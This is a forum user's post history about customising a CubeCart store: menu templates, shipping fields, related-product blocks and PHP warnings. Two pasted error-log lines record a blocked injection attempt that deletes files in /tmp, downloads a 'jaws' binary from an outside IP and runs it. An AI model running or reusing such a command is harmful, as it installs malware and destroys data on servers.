Claudia
Member-
Posts
297 -
Joined
-
Last visited
-
Days Won
2
Everything posted by Claudia
-
I may want to change the > to a side triangle. I got this error when I tried to open the icon-sprites.svg" file. This page contains the following errors: error on line 1 at column 1: Document is empty Below is a rendering of the page up to the first error. Any idea about this: {$BRANCH.children} How can I get it it's own styling Do I put it in a <div> or <span> <div class=??> {$BRANCH.children} </div>
-
Kinda, been working on it, again, all day .... still some stuff I can't figure out. For instance: where do I find the icons (>) How can I hide the children from small display. May have more questions My new tree code: <li {if isset($BRANCH.children)}class="has-sub-cbd"{/if}> <a href="{$BRANCH.url}" title="{$BRANCH.name}" class="vm-box-link-cbd">{$BRANCH.name} {if isset($BRANCH.children)}<svg class="icon icon-x1 has-sub-arrow-cbd"><use xlink:href="#icon-angle-right"></use></svg>{/if}</a> {if isset($BRANCH.children)} <ul class="vnb-sub-cbd"> <li itemprop="name" class="vnb-sub-title">{$BRANCH.name}</li> {$BRANCH.children} </ul> {/if} </li> icon-x1 I created this {$BRANCH.children} How can I get it it's own styling
-
I have tried for days to do this but can’t figure out how. I have my vertical menu working but I don’t know how to put the >> (or sideways triangle) on the main category when it has children. Also, if I want my children styled different than the parent how do I do that. Here is my code. Thanks for any help! Skin/element.navigation_tree <li class="has-sub-cbd"> <a class="vm-box-link-cbd" href="{$BRANCH.url}" title="{$BRANCH.name}">{$BRANCH.name}</a> {if isset($BRANCH.children)} <ul class="vnb-sub-cbd"> <!-- <li itemprop="name" class="vnb-sub-title-cbd">{$BRANCH.name}</li> --> {$BRANCH.children} </ul> {/if} </li> I commented out <!-- <li itemprop="name" class="vnb-sub-title-cbd">{$BRANCH.name}</li> --> because I don’t want the main category name showing with the children. Skin/box.navigation {if $CATEGORIES} {$CATEGORIES} {else} <div id="vm-container"> <ul itemscope itemtype="http://www.schema.org/SiteNavigationElement" class="vm-top"> <li itemprop="name"><a class="vm-box-link-cbd" itemprop="url" href="{$ROOT_PATH}" title="{$LANG.common.home}"><svg class="icon"><use xlink:href="#icon-home"></use></svg> Home</a></li> <li> <a href="/listed-only-on-ebay" title="Listed only on eBay" class="vm-ebay-txt">Listed only on eBay</a></li> <li> <a href="/listed-only-on-etsy" title="Listed only on Etsy" class="vm-etsy-txt">Listed only on Etsy</a></li> {$NAVIGATION_TREE} </ul> </div> {/if}
-
I made the changes as suggested in GITHub PHP 8 Warning #3397 - $basket_array['weight'] ?? 0. Now I get these warnings. I know some are not related. [04-Oct-2023 15:32:50 America/Louisville] PHP Warning: Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_94_158_247_123/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 114 [04-Oct-2023 17:22:29 America/Louisville] PHP Deprecated: ucwords(): Passing null to parameter #1 ($string) of type string is deprecated in /home/xxxxxxx/public_html/cache/skin/c6ff5523b42eda7c097b9ded7c507de36a425832_0.file.orders.index.php.php on line 673 [04-Oct-2023 17:30:45 America/Louisville] PHP Warning: Undefined array key "productOptions" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 91 [04-Oct-2023 17:57:09 America/Louisville] PHP Warning: Undefined array key "productOptions" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 116 [04-Oct-2023 17:57:09 America/Louisville] PHP Warning: Undefined array key "custom" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 124 [04-Oct-2023 18:28:51 America/Louisville] PHP Warning: Undefined array key "cart_order_id" in /home/xxxxxxx/public_html/classes/cubecart.class.php on line 2778 [05-Oct-2023 03:50:09 UTC] PHP Fatal error: Uncaught mysqli_sql_exception: No such file or directory in /home/xxxxxxx/public_html/classes/db/mysqli.class.php:37 Stack trace: #0 /home/xxxxxxx/public_html/classes/db/mysqli.class.php(37): mysqli->__construct() #1 /home/xxxxxxx/public_html/classes/db/mysqli.class.php(64): Database->__construct() #2 /home/xxxxxxx/public_html/controllers/controller.index.inc.php(22): Database::getInstance() #3 /home/xxxxxxx/public_html/index.php(27): include('/home/cambarga/...') #4 {main} thrown in /home/xxxxxxx/public_html/classes/db/mysqli.class.php on line 37 [04-Oct-2023 23:50:46 America/Louisville] PHP Warning: Invalid Security Token in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 155 [04-Oct-2023 23:50:46 America/Louisville] PHP Warning: Undefined global variable $_GET in /home/xxxxxxx/public_html/includes/functions.inc.php on line 218 [05-Oct-2023 05:47:24 America/Louisville] PHP Warning: Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_121_62_21_23/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 114
-
Thanks again Brian. The URL has been deleted. I'll look into the first one.
-
For the last few days I keep getting these warnings over and over in my cPanel error log. Nothing in admin error log. Thanks for any and all help [02-Oct-2023 12:53:02 America/Louisville] PHP Warning: Trying to access array offset on value of type bool in /home/cambarga/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 307 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: Entity: line 1: parser error : Opening and ending tag mismatch: link line 1 and head in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: al-scale=1"><link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"></head> in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: ^ in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: Entity: line 1: parser error : xmlParseEntityRef: no name in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: ge/v1?ray=80f8b6039edadd68';window._cf_chl_opt.cOgUHash = location.hash === '' & in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' & in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: 1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: OgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history & in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: ^ in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: gUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: nt.getElementsByTagName('head')[0].appendChild(cpo);}());</script></body></html> in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: ^ in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:08:00 America/Louisville] PHP Warning: SimpleXMLElement::__construct() [<a href='http://docs.php.net/manual/en/simplexmlelement.construct.php'>simplexmlelement.construct.php</a>]: Entity: line 1: parser error : Premature end of data in tag meta line 1 in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 439 [02-Oct-2023 11:34:35 America/Louisville] PHP Warning: String could not be parsed as XML in /home/xxxxxxx/public_html/admin_OE2vfW/sources/dashboard.index.inc.php on line 463
-
Can I do this? I don't like the way the ship date is formatted 'all_ship_date' => $order['all_ship_date'], 'venue_ship_product' => $order['venue_ship_product'], 'all_shipping_used' => $order['all_shipping_used'], <div class="title-mid marg-top">{$LANG.common.delivery}</div> {if !empty($DELIVERY.all_ship_date)} <div class="row"> <div class="small-6 medium-3 columns">Shipping Date:</div> <div class="small-6 medium-9 columns">{$DELIVERY.all_ship_date}</div> </div> {/if} {if !empty($DELIVERY.venue_ship_product)} <div class="row"> <div class="small-6 medium-3 columns">Shipping Paid For:</div> <div class="small-6 medium-9 columns">{$DELIVERY.venue_ship_product}</div> </div> {/if} {if !empty($DELIVERY.all_shipping_used)} <div class="row"> <div class="small-6 medium-3 columns">Shipping Used:</div> <div class="small-6 medium-9 columns">{$DELIVERY.all_shipping_used}</div> </div> {/if}
-
do you mean 'alt_ship_date' or my table all_ship_date
-
All of those fields are in the order_summary database, but I can put them where needed for the code snippet to work. Or, if possible, I'd rather change the stock code.
-
How does CubeCart determine what to use as the shipping date of an order? Is it set by when the status of the order is set as complete? I would like to be able to input this info manually; and how would I make it work on the order history / view details page when the customer is logged into their account. Thanks for any and all help! I use a database called all_ship_date and manually input the date for all orders whether the order is thru the store or I create it for offsite sales. I also do this for the shipping paid for - venue_ship_product for and the shipping used - all_shipping_used (often times I give a shipping upgrade and want the customer to know) I'd like to implement them here too This is what I have in skin/contents/receipt {if $DELIVERY} <hr> <div class="title-mid marg-top">{$LANG.common.delivery}</div> {if !empty($DELIVERY.date)} <div class="row"> <div class="small-6 medium-3 columns">Shipping Date:</div> <div class="small-6 medium-9 columns">{$DELIVERY.date}</div> </div> {/if} {if !empty($DELIVERY.method)} <div class="row"> <div class="small-6 medium-3 columns">Shipping Carrier:</div> <div class="small-6 medium-9 columns">{$DELIVERY.method}</div> </div> {/if}
-
I'm just curious ... why did it make a difference taking out the ()?
-
I took the () out and it works! Thanks Brian FYI: I had the () in because that what shows in product description and I was just following what it did. Well I don't know what is going on now! I looked at another product that has this and look! Plus none of it is showing in the editor in the admin skin product page https://www.cambargainstore.com/candle-lamp-cowboys I got it to work
-
Here you go. This is my skin code. {if $PRODUCT.specs_title_12} <div class="block_container"> <div class="bc-subtitle"> {$PRODUCT.specs_title_12}</div> {/if} {if $PRODUCT.specs_content_12} <div class="bc-txt">{$PRODUCT.specs_content_12}</div></div> {/if} {if ($PRODUCT.related_used_with)} <div> {$PRODUCT.related_used_with} </div> {/if} </form> <div class="hide" id="validate_field_required">{$LANG.form.field_required}</div> </div> {else} <p>{$LANG.catalogue.product_doesnt_exist}</p> {/if}
-
no nothing changes. No matter what changes I make nothing changes
-
Yes I click the clear cache button more than I should probably
-
I looked in myphp at that product and the record is updated
-
This is the part of debug in admin for the example page. 'related_used_with' => <div class="title-related thinmarg-top">Use with Our:</div> <div class="row pad-topbottom"> <div class="small-12 medium-3 large-3 columns center"><a href="/tealight-candles-and-more" title="Tealight Candles"><img alt="Tealight Candles" class="th" src="../images/related/candle-tealight-lot-5-150.jpg" title="Tealight Candles" /></a><br /> <a class="related center" href="/tealight-candles-and-more" target="_blank" title="Tealight Candles">Tealight Candles</a></div> <div class="small-12 medium-3 large-3 columns center"><a href="/scented-oils" title="Scented Oils"><img alt="Scented Oils" class="th" src="../images/related/scented-oils-lot-5-150.jpg" title="Scented Oils" /></a><br /> <a class="related center" href="/scented-oils" target="_blank" title="Scented Oils">Scented Oils</a></div> <div class="small-12 medium-3 large-3 columns center"><a href="/scented-tarts"><img alt="Scented Tarts" class="th" img="" src="../images/related/scented-tarts-lot-6-150.jpg" title="Scented Tarts" /></a><br /> <a class="related center" href="/scented-tarts" target="_blank" title="Scented Tarts">Scented Tarts</a></div>
-
Deleted Code from DataBase for related_used_with It works when I add the code to the product description, but it's in the wrong place. See link above. Do I need to add the related_used_with and specs to the product description?
-
"I change my code -- from what to what? " From the code in the original post to what you gave me "Still shows the original -- what? " from the code in the original post "Is this "code" actually part of the product's Description? " No it's a new section I created .... It all worked (not the "th" in 6.5.1). I guess if I had to I could add it to the product description. ADMIN PRODUCTS SOURCES $record = $_POST; $record['description'] = $GLOBALS['RAW']['POST']['description']; $record['sold_venue_tag'] = $GLOBALS['RAW']['POST']['sold_venue_tag']; $record['related_used_with'] = $GLOBALS['RAW']['POST']['related_used_with']; unset($record['categories'], $record['group'], $record['image']); ADMIN PRODUCTS SKIN <fieldset> <legend style="width:99.5%">Sold Venue Tag</legend> <textarea name="sold_venue_tag" id="sold_venue_tag" class="textbox fck">{$PRODUCT.sold_venue_tag}</textarea> </fieldset> </td> <td width="1%"> </td> <td width="48%"> <fieldset> <legend style="width:99.5%">{$LANG.common.description}</legend> <textarea name="description" id="description" class="textbox fck">{$PRODUCT.description}</textarea> </fieldset> </td> </tr> </table> <table width="50%"> <tr> <td width="50%"> <fieldset> <legend style="width:99.5%">Related / Used With</legend> <textarea name="related_used_with" id="related_used_with" class="textbox fck">{$PRODUCT.related_used_with}</textarea> </fieldset> If I make it part of the description it works ... but.... it is placed above the products specs. and even though I delete the code in the related_used_with it still shows.
-
I don't know if that will work for me or not. Even when I change my code, the frontend page still shows the original, though the admin shows the changes. Here's my revised testing code. I have even checked my admin product skin and source codes. <div class="small-12 medium-3 large-3 columns center"> <a href="/tealight-candles-and-more" title="Tealight Candles"><img class="th" alt="Tealight Candles" src="../images/related/candle-tealight-lot-5-150.jpg" title="Tealight Candles"></a><br /> <a class="related center" href="/tealight-candles-and-more" target="_blank" title="Tealight Candles">Tealight Candles</a> </div>
-
I have setup a new section in my product listings that I use for some of my listings. It's Called Use With (or Related too). It shows images of items that can be used for that product listing along with a link to that item. My question is how do I get the image "th" class to work on these images? I have setup a new folder in the main images file (/public_html/images/related/) to store the images used. Here's a page example FYI - Here's a sample of the code I'm now using. I tried to put the img class="th" src code and rearranged the alt and title but it wouldn't take. <div class="title-related thinmarg-top">Use with Our:</div> <div class="row pad-topbottom"> <div class="small-12 medium-3 large-3 columns center"> <a href="/tealight-candles-and-more"><img alt="Tealight Candles" src="../images/related/candle-tealight-lot-5-150.jpg" style="border-width: 0px;" title="Tealight Candles" /></a><br /> <a class="related center" href="/tealight-candles-and-more" target="_blank" title="Tealight Candles">Tealight Candles</a> </div> Thanks for any all help!!!
-
Isn't it amazing when things work when you follow the directions! I had to tweak my grids but other than that it works perfectly. Thank you again Brian
-
Damn! I did edit the cubecart.helpers.css file but I forgot to upload it. I'll try that again.
-
The code worked except on the one image products page it shows a thumbnail of that image on the main product page and the enlarged image page. I know that is how it is suppose to work but is there a way to not show the thumbnail?